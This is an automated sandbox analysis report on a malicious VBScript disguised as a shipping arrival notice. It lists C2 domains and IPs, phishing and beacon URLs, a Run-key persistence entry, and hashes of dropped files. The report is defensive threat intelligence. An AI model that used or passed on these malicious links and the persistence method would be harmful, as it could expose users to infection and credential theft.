                                                                                                            		sixie.porkbun.comUnited States
                                                                                                            		16509AMAZON-02USfalse
                                                                                                            45.117.11.104
                                                                                                            		www.avi3p3g.topChina
                                                                                                            		58678INTECHONLINE-INIntechOnlinePrivateLimitedINtrue
                                                                                                            109.94.209.55
                                                                                                            		proofreading.uzRussian Federation
                                                                                                            		202376ARVID-LOGICUMEEfalse
                                                                                                            34.102.136.180
                                                                                                            		priorityfirst.infoUnited States
                                                                                                            		15169GOOGLEUSfalse
                                                                                                            166.88.142.63
                                                                                                            		www.meizhuangs.comUnited States
                                                                                                            		18779EGIHOSTINGUStrue
                                                                                                            64.190.62.22
                                                                                                            		b12-overdose.siteUnited States
                                                                                                            		11696NBS11696UStrue
                                                                                                            45.77.55.161
                                                                                                            		www.vivino.appUnited States
                                                                                                            		20473AS-CHOOPAUStrue
                                                                                                            154.201.220.155
                                                                                                            		www.ransbottompottery.comSeychelles
                                                                                                            		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                                                            154.83.27.102
                                                                                                            		www.www55275.comSeychelles
                                                                                                            		62587ANT-CLOUDUStrue
                                                                                                            168.206.212.12
                                                                                                            		www.erinandroger.comSouth Africa
                                                                                                            		137951CLAYERLIMITED-AS-APClayerLimitedHKtrue

                                                                                                            General Information

                                                                                                            Joe Sandbox Version:35.0.0 Citrine
                                                                                                            Analysis ID:688300
                                                                                                            Start date and time:2022-08-22 19:58:15 +02:00
                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                            Overall analysis duration:0h 17m 4s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Sample file name:NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbs
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                            Run name:Suspected Instruction Hammering
                                                                                                            Number of analysed new started processes analysed:17
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:1
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • HDC enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winVBS@21/15@14/10
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            HDC Information:
                                                                                                            • Successful, ratio: 7.1% (good quality ratio 6.6%)
                                                                                                            • Quality average: 69%
                                                                                                            • Quality standard deviation: 25.3%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            • Number of executed functions: 179
                                                                                                            • Number of non-executed functions: 161
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .vbs
                                                                                                            • Adjust boot time
                                                                                                            • Enable AMSI

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                            • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, wdcpalt.microsoft.com, ctldl.windowsupdate.com, wdcp.microsoft.com
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            TimeTypeDescription
                                                                                                            20:01:12API Interceptor39x Sleep call for process: powershell.exe modified
                                                                                                            20:03:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 5JULP2EX C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                            20:03:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 5JULP2EX C:\Program Files (x86)\internet explorer\ieinstal.exe

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            45.117.11.104SMK_NEW_ORDER_SHIPMENT9484.PDF.vbsGet hashmaliciousBrowse
                                                                                                              166.88.142.63FILE67#U007e0.VBSGet hashmaliciousBrowse
                                                                                                              • www.meizhuangs.com/oe07/
                                                                                                              64.190.62.22BVCDFD.exeGet hashmaliciousBrowse
                                                                                                              • www.eatingdisorderstest.site/ugez/?3fU8L=KiBK8HKIBJYu0AUU+hwXJEwXz7VQHnm27AelhPgZXANcfPHSLLvnHbOAq28E5h8VzZXGQNqpi1qLkWjaC9ZjwuEac525z8D/uA==&m48xX=B2MheJMhX8Ll
                                                                                                              confirmation Order.pdf.exeGet hashmaliciousBrowse
                                                                                                              • www.sunsolarpanelprice.xyz/jem9/?sH=3fp8ZX-XoTgpwP&-ZP=SXJ6TW7YH6zM4m27zuwFdsu0fpL90FlRjZumVaXiv2gN7pXrzeaJYPeK/3U81RjgNKHIzE/VdT0/F29s3K682De1ipIQekjlSg==
                                                                                                              Konsumeres.exeGet hashmaliciousBrowse
                                                                                                              • www.comprar-carros.cloud/o8es/?e6Adu4=wTrchHcSZSqxelHruy4tdaqH381otfNL+0BKhfK9O2e6azPdfOZO/5W3im6cVMUH+YmQORcuCeLKuzoHW8LPieygF73joq1xeQ==&O67=yJB8g8sX-p
                                                                                                              VAVzsvZHSulwtue.exeGet hashmaliciousBrowse
                                                                                                              • www.wallpainting.site/wjrw/?p2J=H6Z5PVNL5Bp5og/W45W9Q1uIUFu136qAGIWpw9s5XaY/elfAjQpYvoKeeTFt6f+qEfcHx1sIhz/6FW0lPlrxkaKF/L+fpL54nw==&R0G4l=YL04q4
                                                                                                              PO.vbsGet hashmaliciousBrowse
                                                                                                              • www.housepaintingprice.site/h96v/?1b=9KQq5Tqa0R8b07RM9d9q1kK9lLfFExd0KAZwGQyOwb6ITYK/UXqq6ltB3JSL4gr+krDrlEpRO/EntRQB+VrqlR5It5HF5n5+Ag==&EjBPe=kxlHe
                                                                                                              HSBC payment transfer 14-08-202210.50.pdf.exeGet hashmaliciousBrowse
                                                                                                              • www.sunsolarpanelprice.xyz/jem9/?xVPLf4=1b9hArt0KvWlMT1&iPyHaN=SXJ6TW7YH6zM4m27zuwFdsu0fpL90FlRjZumVaXiv2gN7pXrzeaJYPeK/3U81RjgNKHIzE/VdT0/F29s3K6u/helldw+YGe/Ag==
                                                                                                              HSBC payment transfer 14-08-202210.50.exeGet hashmaliciousBrowse
                                                                                                              • www.sunsolarpanelprice.xyz/jem9/?A4=SXJ6TW7YH6zM4m27zuwFdsu0fpL90FlRjZumVaXiv2gN7pXrzeaJYPeK/3U81RjgNKHIzE/VdT0/F29s3K682FLn8fYQfkbTSg==&i6t=t0GDytr0O2Ud82Ip
                                                                                                              SCAN_039478575-PDF.exeGet hashmaliciousBrowse
                                                                                                              • www.sunsolarpanelprice.xyz/q9dv/?Jbh8aP=mbaY+TBSqUHOo8gpH6FBL8Py+hWXML0eMTIXYIpepCJeC5wqPlW8SZpCxmCYPTFINkdhKlzIDgh+nulxF9mKzyLTzuJQtHGRcg==&m8sX4N=6lrLYL38Pp3TVn4p
                                                                                                              General Catalogue.PDF.exeGet hashmaliciousBrowse
                                                                                                              • www.watch-episodes.site/o85a/?8pT=HIwFtYDbSdS1zIo/y7Hc5av87idPen+jrxTDiYx3Vxwpy0jXgW3WFCCCsup2uAFh2mPJ&x0DD7=i6A8
                                                                                                              SecuriteInfo.com.Variant.Strictor.274283.27665.exeGet hashmaliciousBrowse
                                                                                                              • www.retireinluxuryvillagesuk.space/rh22/?HDH=8pTD&l0Ghe=Rh0TLHXoJZ6lPpDK8avuazg/BrCcoIRPUA/b4i/qLXCYclBMHkvaciVx95BuCoDLotZn
                                                                                                              1.exe.exeGet hashmaliciousBrowse
                                                                                                              • www.senior-living-homes1.life/uniz/?W0Dp=nAl2T8RaEooMFbi5nahcmCYS3JyaZWqjsP/Vo6ed42PM6BRSF977uT3iZ83atUvwH9N/&p6Ad=9r3dkTFxAneX8FcP
                                                                                                              Purchase_Order.exeGet hashmaliciousBrowse
                                                                                                              • www.junkremovalhelp.xyz/ct2t/?0vatmnu=iayrV7jWtc4/kXVsjK8nMsuekLJwCPLH4TdqTqb6Vf7Y+NX/4Xd8deFPJIS1555kUEx3fdmUhA==&GFQLx=xRq48VtX_0tL

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              www.avi3p3g.topSMK_NEW_ORDER_SHIPMENT9484.PDF.vbsGet hashmaliciousBrowse
                                                                                                              • 45.117.11.104
                                                                                                              www.vivino.appSMK_TMBV_74848474653535.vbsGet hashmaliciousBrowse
                                                                                                              • 45.77.55.161
                                                                                                              SHIPPING_DELAY_NOTICE_URGENT.PDF.vbsGet hashmaliciousBrowse
                                                                                                              • 45.77.55.161
                                                                                                              SMK_NEW_ORDER_SHIPMENT9484.PDF.vbsGet hashmaliciousBrowse
                                                                                                              • 45.77.55.161
                                                                                                              www.ransbottompottery.comSMK_NEW_ORDER_SHIPMENT9484.PDF.vbsGet hashmaliciousBrowse
                                                                                                              • 154.201.220.155
                                                                                                              www.meizhuangs.comFILE67#U007e0.VBSGet hashmaliciousBrowse
                                                                                                              • 166.88.142.63
                                                                                                              www.erinandroger.comFILE67#U007e0.VBSGet hashmaliciousBrowse
                                                                                                              • 168.206.212.12
                                                                                                              SMK_TMBV_74848474653535.vbsGet hashmaliciousBrowse
                                                                                                              • 168.206.212.12
                                                                                                              SMK_NEW_ORDER_SHIPMENT9484.PDF.vbsGet hashmaliciousBrowse
                                                                                                              • 168.206.212.12

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              AMAZON-02UShttp://sp.brd.to/f/a/Ec3gioVLJEqXUW4gMKvPVA~~/AAAZ0QA~/RgRk4kPFP0R0aHR0cHM6Ly90cmFja2VyLnRyYXZlbHNlY3VyaXR5LmNvbS9EZWZhdWx0LmFzcHg_ZG1sbGQxUjVjR1U5WTI5dGJYVnVhV05oZEdsdmJtaHBjM1J2Y25rbWJXVnpjMkZuWldsa1BURTRPREU1TnpZMk1RPT1XBXNwY2V1Qgpi8cW-_2Il66dBUhlQaHlsbGlzLkNvdWx0ZXJAdXMuZ3QuY29tWAQAAAEUGet hashmaliciousBrowse
                                                                                                              • 34.252.122.33
                                                                                                              Temporary_Salary_Reduction_Agreement_Form.htmlGet hashmaliciousBrowse
                                                                                                              • 13.32.145.72
                                                                                                              https://houshmandrabbani.com/#pbs_mpa@peabodyenergy.comGet hashmaliciousBrowse
                                                                                                              • 52.216.96.245
                                                                                                              http://enews.email.readingeagle.com/q/tAo2_OZg7pn3wWpuhjKl_E14nXegPatJ2ZcOJQk1jRG9ub3VnaEByZWRuZXJzbWFyL0Xa2V0cy5jb23DiGVOb3RpZnlccmVnaXN0cmF0aW9uSWTDiWF1dGgwJTdjNWZkNzkwMTUxYzBjYWYwMDFhMzU4ZWM1w4gbqCgo6s-fZIouyYNFkJ_CWynqQGet hashmaliciousBrowse
                                                                                                              • 35.156.141.29
                                                                                                              lwBmyI5MgR.exeGet hashmaliciousBrowse
                                                                                                              • 35.158.114.105
                                                                                                              https://linkprotect.cudasvc.com/url?a=https%3a%2f%2f1drv.ms%2fw%2fs%21AkZcUYuenXVIenpRaJoduM6bjmk&c=E,1,pa1F_MGOObqJmMq0V5q0hZK3uSWZJRqp837xDf9WtsW0xWbHqIefGSfz3ehvXJARceUoyBI7b-Rr1P5loEtBZ3eTlguNQH9eEVOfZsu9sLUQRXYJCrRB9RxwTuA,&typo=1Get hashmaliciousBrowse
                                                                                                              • 52.58.201.96
                                                                                                              https://www.dropbox.com/scl/fi/5pz27ne57wg7gtykvi7h9/Untitled.paper?dl=0&rlkey=qikh3szduqg1zezs0178jsbq6Get hashmaliciousBrowse
                                                                                                              • 99.84.146.27
                                                                                                              http://enews.email.readingeagle.com/q/tAo2_OZg7pn3wWpuhjKl_E14nXegPatJ2ZcOJQk1jRG9ub3VnaEByZWRuZXJzbWFyL0Xa2V0cy5jb23DiGVOb3RpZnlccmVnaXN0cmF0aW9uSWTDiWF1dGgwJTdjNWZkNzkwMTUxYzBjYWYwMDFhMzU4ZWM1w4gbqCgo6s-fZIouyYNFkJ_CWynqQGet hashmaliciousBrowse
                                                                                                              • 54.65.155.184
                                                                                                              https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ft.sidekickopen90.com%2fs3t%2fc%2f5%2ff18dQhb0S7kF8bq4vMW1ZZNyr59hl3kW7_k2841CX6NGW35Qwst2P30rcW1Gg0Ky1G9PY-f197v5Y04%3fte%3dW3R5hFj4cm2zwW3P4GYb4hGQfYW1GF81s4cKgQMW3K7-Pp41YswkW43T4N44kgJ5gW1LBbZl4ff2Q3W1Zp_xg1_lZ4zW38j1Y-3VKS-vW1SzZSg2xGjbZW2v-cdD2q-yJKW38yLZk3T6gQyW3R0c_f2k4z1Wn3M1rky1d3%26si%3d8000000019851939%26pi%3dbb677ff1-fd12-40f3-9afc-dc5cce904c99&c=E,1,mH384XKIgFTXBm0Nzw3jNdtyNYUY9Qpu9WbRV1pGJGIGCNGteA_WUez0n4WM4eEfezAICcG4Zv0uwbJNvHKdPuYC42GeKJYUrjAgDCeXNFetms2bwQ,,&typo=1Get hashmaliciousBrowse
                                                                                                              • 3.122.11.60
                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                              • 18.130.38.218
                                                                                                              https://editor.verizonsmallbusinessessentials.com/viewer/vbid-fcbe0563-dm3ky7clGet hashmaliciousBrowse
                                                                                                              • 99.86.159.40
                                                                                                              Specifications & Xrawings_newpdf.vbsGet hashmaliciousBrowse
                                                                                                              • 76.223.105.230
                                                                                                              https://www.beautiful.ai/player/-N9pZkRs5dNTyCZW8cHwGet hashmaliciousBrowse
                                                                                                              • 52.26.117.0
                                                                                                              https://www.beautiful.ai/player/-N9pZkRs5dNTyCZW8cHwGet hashmaliciousBrowse
                                                                                                              • 54.201.51.171
                                                                                                              https://call.voipmessage.uk/XWlRGdWFVOVpiMVY2YzA5aWMycGplVU5JYlGet hashmaliciousBrowse
                                                                                                              • 54.171.31.201
                                                                                                              https://www.dropbox.com/scl/fi/7a89wxwjajri80878lg50/Folder-PO_0938434_-0087-_-Has-been-shared-with-you_.paper?dl=0&rlkey=1g42ebcy77cb64lb0lp0qjtv6Get hashmaliciousBrowse
                                                                                                              • 99.86.114.74
                                                                                                              https://www.dropbox.com/scl/fi/7a89wxwjajri80878lg50/Folder-PO_0938434_-0087-_-Has-been-shared-with-you_.paper?dl=0&rlkey=1g42ebcy77cb64lb0lp0qjtv6Get hashmaliciousBrowse
                                                                                                              • 143.204.89.57
                                                                                                              https://app.jetadmin.io/public/07y774ne4akcag313k3ufrlambmhe97eGet hashmaliciousBrowse
                                                                                                              • 52.222.206.6
                                                                                                              https://app.pipefy.com/public/form/-1ViPCMBGet hashmaliciousBrowse
                                                                                                              • 99.86.113.100
                                                                                                              wid7kjGrd8.exeGet hashmaliciousBrowse
                                                                                                              • 99.83.154.118
                                                                                                              INTECHONLINE-INIntechOnlinePrivateLimitedINHb8GD7pr7ZGet hashmaliciousBrowse
                                                                                                              • 103.226.7.1
                                                                                                              ccn.exeGet hashmaliciousBrowse
                                                                                                              • 45.117.11.188
                                                                                                              SMK_NEW_ORDER_SHIPMENT9484.PDF.vbsGet hashmaliciousBrowse
                                                                                                              • 45.117.11.104
                                                                                                              OqrBUGKdjoGet hashmaliciousBrowse
                                                                                                              • 103.48.102.249
                                                                                                              A7tTg2veAkGet hashmaliciousBrowse
                                                                                                              • 103.226.7.3
                                                                                                              Ares.arm7Get hashmaliciousBrowse
                                                                                                              • 43.241.133.62
                                                                                                              sora.x86Get hashmaliciousBrowse
                                                                                                              • 43.241.133.54
                                                                                                              WoQvOAqworGet hashmaliciousBrowse
                                                                                                              • 103.48.102.203
                                                                                                              Quote.jsGet hashmaliciousBrowse
                                                                                                              • 45.117.11.244
                                                                                                              bin.exeGet hashmaliciousBrowse
                                                                                                              • 45.117.11.244
                                                                                                              SecuriteInfo.com.W32.AIDetectNet.01.2197.exeGet hashmaliciousBrowse
                                                                                                              • 45.117.11.63
                                                                                                              Ia2OMVYincGet hashmaliciousBrowse
                                                                                                              • 103.226.7.4
                                                                                                              G7DPXex2a3Get hashmaliciousBrowse
                                                                                                              • 103.59.188.78
                                                                                                              sora.armGet hashmaliciousBrowse
                                                                                                              • 43.241.133.27
                                                                                                              479WdOLSBH.exeGet hashmaliciousBrowse
                                                                                                              • 45.117.11.32
                                                                                                              84wwQQbbDjGet hashmaliciousBrowse
                                                                                                              • 103.226.7.5
                                                                                                              wjDBh1jsVP.exeGet hashmaliciousBrowse
                                                                                                              • 45.117.11.243
                                                                                                              X9rvYgD74YGet hashmaliciousBrowse
                                                                                                              • 103.14.235.28
                                                                                                              DOgFvNsLeYGet hashmaliciousBrowse
                                                                                                              • 124.108.18.117
                                                                                                              db0fa4b8db0333367e9bda3ab68b8042.x86Get hashmaliciousBrowse
                                                                                                              • 43.241.133.29

                                                                                                              JA3 Fingerprints

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                              37f463bf4616ecd445d4a1937da06e19http://sp.brd.to/f/a/Ec3gioVLJEqXUW4gMKvPVA~~/AAAZ0QA~/RgRk4kPFP0R0aHR0cHM6Ly90cmFja2VyLnRyYXZlbHNlY3VyaXR5LmNvbS9EZWZhdWx0LmFzcHg_ZG1sbGQxUjVjR1U5WTI5dGJYVnVhV05oZEdsdmJtaHBjM1J2Y25rbWJXVnpjMkZuWldsa1BURTRPREU1TnpZMk1RPT1XBXNwY2V1Qgpi8cW-_2Il66dBUhlQaHlsbGlzLkNvdWx0ZXJAdXMuZ3QuY29tWAQAAAEUGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              file.exeGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              wrD996N3B3.exeGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              OD-00072791.jsGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              zXDBMZsdPw_Quotes_pdf.jsGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              7yYa22xkWR.exeGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              ap3xhy908y.exeGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              http://enews.email.readingeagle.com/q/tAo2_OZg7pn3wWpuhjKl_E14nXegPatJ2ZcOJQk1jRG9ub3VnaEByZWRuZXJzbWFyL0Xa2V0cy5jb23DiGVOb3RpZnlccmVnaXN0cmF0aW9uSWTDiWF1dGgwJTdjNWZkNzkwMTUxYzBjYWYwMDFhMzU4ZWM1w4gbqCgo6s-fZIouyYNFkJ_CWynqQGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              https://editor.verizonsmallbusinessessentials.com/viewer/vbid-fcbe0563-dm3ky7clGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              j7nf6L5S61.exeGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              output(1).jsGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              output(1).jsGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              i9AGILMZeb.exeGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              https://www.dropbox.com/scl/fi/7a89wxwjajri80878lg50/Folder-PO_0938434_-0087-_-Has-been-shared-with-you_.paper?dl=0&rlkey=1g42ebcy77cb64lb0lp0qjtv6Get hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              https://website2627625.nicepage.io/Home.htmlGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              VNuZFR6FKA.exeGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              Voice Message_1982022 92045 pm_42512c0fecb14d11aa7cc8bd9c68752f.htmlGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              https://securepubads.g.doubleclick.net/pcs/view?adurl=https://bill.s2hgroups.com/?username=tom.adams@occstrategy.comGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              Se adjunta nueva lista de pedidos.exeGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55
                                                                                                              DHL_11429040 #Uc601#Uc218#Uc99d #Ubb38#Uc11c, pdf.exeGet hashmaliciousBrowse
                                                                                                              • 109.94.209.55

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:modified
                                                                                                              Size (bytes):8003
                                                                                                              Entropy (8bit):4.841989710132343
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
                                                                                                              MD5:677C4E3A07935751EA3B092A5E23232F
                                                                                                              SHA1:0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
                                                                                                              SHA-256:D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
                                                                                                              SHA-512:253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
                                                                                                              Malicious:false
                                                                                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                              C:\Users\user\AppData\Local\Temp\DB1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000
                                                                                                              Category:dropped
                                                                                                              Size (bytes):45056
                                                                                                              Entropy (8bit):0.7853305971874845
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:43b/DVIIgyZKLk8s8LKvUf9K4UKTgyJqhtcebVEq8Ma0D0HOlcjlGxdKmtAONu41:Sb+uKLyeym/grcebn8MouOjlGxdKmt3N
                                                                                                              MD5:00C036C61F625BF9D25362B9BE24ADEB
                                                                                                              SHA1:6738C3D037E4A2E9F41B1398BA88E5771532F593
                                                                                                              SHA-256:0C187B091E99E5BB665C59F8F8E027D5658904B32E4196D2EB402F3B1CAD69EF
                                                                                                              SHA-512:711265BC8C1653BF6E862343BF3149A2AB09F4BA7D38E2D8A437001DB6C0F1936F6362571DD577CD7BDBEEC766DF141CB7E0681512C12E25A99CDB71731232D1
                                                                                                              Malicious:true
                                                                                                              Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\RESC6A9.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1336
                                                                                                              Entropy (8bit):3.9833041663578803
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:Hf8m90lWhYHewKTFpmfwI+ycuZhNoakSkPNnqSSd:elaYdKTzmo1uloa3kqSC
                                                                                                              MD5:532C5EC29F8CB2FFF220C39F0A4CBE6F
                                                                                                              SHA1:2C0C4BB7CE927E59D1D8E9A5A8B3A5B2285014F9
                                                                                                              SHA-256:B789AA3FB1A14537218A5C5EC7E02269E259DF623BDED7889E6B12E6431C3377
                                                                                                              SHA-512:AE0A1D3C85B55FA1159970DC26E1B00CCA242EBE9E22A6B07A097B967DE71EF2C8DB0032A11A5D7A3334A29CE260074D752FCE200A4F3E2BE4827168BF1E3B69
                                                                                                              Malicious:false
                                                                                                              Preview:L......c.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\r0st5wfi\CSC6C14E777B6F1436A823D509EAA82CA50.TMP..............................^.De..........5.......C:\Users\user\AppData\Local\Temp\RESC6A9.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.0.s.t.5.w.f.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aslxw1ec.avb.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqhyesjp.mvq.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\r0st5wfi\CSC6C14E777B6F1436A823D509EAA82CA50.TMP

                                                                                                              Download File
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                              File Type:MSVC .res
                                                                                                              Category:dropped
                                                                                                              Size (bytes):652
                                                                                                              Entropy (8bit):3.0838959950026075
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry4Xak7YnqqjAPN5Dlq5J:+RI+ycuZhNoakSkPNnqX
                                                                                                              MD5:8DE3F2CD09BE1D9117F2F8825EEE4465
                                                                                                              SHA1:250798C0B2A83C137FCF4D421A39407E71A71EAE
                                                                                                              SHA-256:50FEAA116DA263496DB5189926F4DAD1FC346542E72E9E5D8741C99000ECB5AC
                                                                                                              SHA-512:D92077155B897EF0EB3427986E94D5D3EFA7A3A04819725F8805E7C1FA42B7FC4DA98C450DD38DEC0ABFCEE03E6F1F51988B31A2D1254C1E4C3AF7F456D103BA
                                                                                                              Malicious:false
